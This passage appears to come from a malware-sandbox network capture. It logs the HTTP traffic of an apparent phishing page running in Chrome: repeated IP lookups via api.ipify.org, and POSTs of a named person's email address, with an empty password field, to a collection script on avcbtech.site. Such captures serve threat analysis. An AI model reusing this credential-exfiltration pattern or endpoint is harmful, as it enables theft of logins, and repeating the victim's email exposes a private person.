2025-03-25 16:14:27 UTC	559	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:27 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=e98153d31084ed84e7f9986a306a94f8; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:14:27 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49771	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:27 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:14:27 UTC	467	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:27 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb38e8847c472-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104942&min_rtt=104922&rtt_var=22149&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=35492&cwnd=247&unsent_bytes=0&cid=87f4c22e9eb2f7c5&ts=269&x=0"
2025-03-25 16:14:27 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49772	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:27 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
2025-03-25 16:14:28 UTC	495	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:28 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:14:28 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49773	104.26.13.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:27 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:14:28 UTC	434	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:28 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb3919e1f52d3-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105501&min_rtt=104856&rtt_var=22458&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=35352&cwnd=252&unsent_bytes=0&cid=a45d716663173ffb&ts=271&x=0"
2025-03-25 16:14:28 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49778	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:35 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 43 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:14:35 UTC	43	OUT	Data Raw: 61 69 3d 72 65 62 65 63 63 61 2e 6b 61 72 70 69 6e 6f 73 25 34 30 6a 75 6e 6b 6c 65 73 73 66 6f 6f 64 73 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=rebecca.karpinos%40junklessfoods.com&pr=
2025-03-25 16:14:36 UTC	559	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:36 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=8740068cfde4bd243ea9f763e9d566da; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:14:36 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49780	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:36 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:14:36 UTC	467	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:36 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb3c65bf09e08-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105845&min_rtt=105635&rtt_var=22609&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=35036&cwnd=241&unsent_bytes=0&cid=20bf0d93a5386448&ts=267&x=0"
2025-03-25 16:14:36 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49781	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:36 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
2025-03-25 16:14:37 UTC	495	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:37 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:14:37 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49782	104.26.13.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:14:36 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:14:37 UTC	434	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:14:37 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb3c9598b49c1-EWR server-timing: cfL4;desc="?proto=TCP&rtt=103406&min_rtt=102468&rtt_var=23047&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=35304&cwnd=247&unsent_bytes=0&cid=aeaf3e55f8398877&ts=280&x=0"
2025-03-25 16:14:37 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49787	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:15:06 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 43 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:15:06 UTC	43	OUT	Data Raw: 61 69 3d 72 65 62 65 63 63 61 2e 6b 61 72 70 69 6e 6f 73 25 34 30 6a 75 6e 6b 6c 65 73 73 66 6f 6f 64 73 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=rebecca.karpinos%40junklessfoods.com&pr=
2025-03-25 16:15:06 UTC	559	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:15:06 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=2398aa0e6a7530cd9a21658d4194e169; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:15:06 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49789	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:15:06 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:15:06 UTC	467	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:15:06 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb4841fd6659d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105637&min_rtt=104997&rtt_var=23142&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1121&delivery_rate=34771&cwnd=231&unsent_bytes=0&cid=a8e9cde9aed72ff4&ts=270&x=0"
2025-03-25 16:15:06 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49790	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:15:07 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
2025-03-25 16:15:07 UTC	495	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:15:07 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:15:07 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49791	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:15:07 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:15:07 UTC	434	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:15:07 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb487cdb91dc7-EWR server-timing: cfL4;desc="?proto=TCP&rtt=102855&min_rtt=102661&rtt_var=21948&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=36084&cwnd=237&unsent_bytes=0&cid=0ce381e80fff9656&ts=263&x=0"
2025-03-25 16:15:07 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49793	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:15:18 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 43 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:15:18 UTC	43	OUT	Data Raw: 61 69 3d 72 65 62 65 63 63 61 2e 6b 61 72 70 69 6e 6f 73 25 34 30 6a 75 6e 6b 6c 65 73 73 66 6f 6f 64 73 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=rebecca.karpinos%40junklessfoods.com&pr=
2025-03-25 16:15:18 UTC	559	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:15:18 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=70ef8c137ed99587b0495da2adb9ca19; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:15:18 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49795	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:15:18 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:15:18 UTC	467	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:15:18 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb4ce6a7a9867-EWR server-timing: cfL4;desc="?proto=TCP&rtt=103138&min_rtt=101773&rtt_var=23523&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1121&delivery_rate=35174&cwnd=252&unsent_bytes=0&cid=61947aa81ed1861a&ts=266&x=0"
2025-03-25 16:15:18 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49797	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:15:19 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:15:19 UTC	434	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:15:19 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb4d16dc58c23-EWR server-timing: cfL4;desc="?proto=TCP&rtt=102760&min_rtt=102444&rtt_var=22098&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=36006&cwnd=224&unsent_bytes=0&cid=31e37a694286c2a7&ts=266&x=0"
2025-03-25 16:15:19 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49796	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:15:19 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
2025-03-25 16:15:19 UTC	495	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:15:19 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:15:19 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49798	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:16:07 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 43 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:16:07 UTC	43	OUT	Data Raw: 61 69 3d 72 65 62 65 63 63 61 2e 6b 61 72 70 69 6e 6f 73 25 34 30 6a 75 6e 6b 6c 65 73 73 66 6f 6f 64 73 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=rebecca.karpinos%40junklessfoods.com&pr=
2025-03-25 16:16:08 UTC	559	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:16:07 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=e03d57df73c2078385fe7e7c90b378fa; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
